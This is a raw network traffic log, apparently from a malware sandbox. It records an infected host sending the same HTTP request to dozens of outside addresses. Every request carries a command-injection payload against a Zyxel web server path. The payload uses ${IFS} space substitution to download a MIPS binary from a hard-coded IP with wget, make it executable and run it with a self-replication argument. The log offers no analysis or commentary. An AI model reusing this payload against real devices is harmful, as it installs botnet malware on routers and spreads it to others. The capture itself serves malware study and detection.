                                              Jan 29, 2024 07:04:06.330262899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8478192.168.2.144256286.10.77.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.330298901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8479192.168.2.1442738209.127.192.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.330342054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8480192.168.2.1453904113.79.161.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.330389023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8481192.168.2.145112887.140.244.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.330411911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8482192.168.2.14420124.147.153.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.330441952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8483192.168.2.1437408131.111.129.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.330471039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8484192.168.2.143311834.94.26.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.330513954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8485192.168.2.1440622113.231.79.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.330591917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8486192.168.2.145618257.243.7.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.330609083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8487192.168.2.1437862205.247.161.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.330646038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8488192.168.2.1436862115.40.195.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.330688953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8489192.168.2.1441946189.208.191.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.330739021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8490192.168.2.1437148123.110.217.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.330792904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8491192.168.2.1451478217.233.37.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.330823898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8492192.168.2.1456670121.4.25.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.330867052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8493192.168.2.144984688.12.67.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.330899000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8494192.168.2.145981427.134.109.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.330929995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8495192.168.2.143966277.41.79.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.330976009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8496192.168.2.145645418.70.191.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.331012964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8497192.168.2.1444314108.140.169.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.331058979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8498192.168.2.1457376194.3.40.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.331108093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8499192.168.2.1433830202.13.179.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.331137896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8500192.168.2.1460062157.137.83.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.331193924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8501192.168.2.1439976205.129.239.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.331216097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8502192.168.2.145773057.211.87.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.331259012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8503192.168.2.146063483.26.91.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.331314087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8504192.168.2.1436168113.169.168.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.331345081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8505192.168.2.1447010212.65.68.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.331387043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8506192.168.2.1444838122.186.22.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.331415892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8507192.168.2.145852627.138.250.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.331456900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8508192.168.2.1460910122.142.47.146443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.331487894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8509192.168.2.1457194121.12.28.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.331523895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8510192.168.2.1454976207.76.94.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.331564903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8511192.168.2.143996868.21.112.214443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.331598043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8512192.168.2.1439948155.10.224.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.331613064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8513192.168.2.1439572156.71.76.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.331671953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8514192.168.2.143307274.158.12.155443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.331720114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8515192.168.2.1440032120.134.149.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.331743956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8516192.168.2.1447416195.8.203.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.331787109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8517192.168.2.1441622190.145.32.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.335381031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8518192.168.2.1451856196.10.140.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.335402966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8519192.168.2.145038225.168.40.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.335453033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8520192.168.2.1455422148.117.94.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.335503101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8521192.168.2.145216258.158.57.108443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.335520983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8522192.168.2.1458882135.9.142.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.335556984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8523192.168.2.145095689.119.245.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.335606098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8524192.168.2.144313854.159.227.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.335628033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8525192.168.2.145304832.120.57.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.335676908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8526192.168.2.1440260191.152.70.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.335722923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8527192.168.2.1442934162.176.93.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.344443083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8528192.168.2.1454710157.9.239.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.344489098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8529192.168.2.1434786137.197.101.24443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.344523907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8530192.168.2.14591768.232.220.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.344573975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8531192.168.2.144318091.172.76.19443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.344599009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8532192.168.2.1443610112.209.43.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.344639063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8533192.168.2.1455340147.52.187.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.344696045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8534192.168.2.144649635.51.4.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.344736099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8535192.168.2.144883867.211.152.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.344759941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8536192.168.2.145568031.37.131.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.344810009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8537192.168.2.14434908.181.244.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.344840050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8538192.168.2.1453248135.70.6.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.344870090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8539192.168.2.14528161.81.13.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.344927073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8540192.168.2.1450594167.46.47.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.344943047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8541192.168.2.1443656174.184.244.89443
                                              TimestampBytes transferredDirectionData
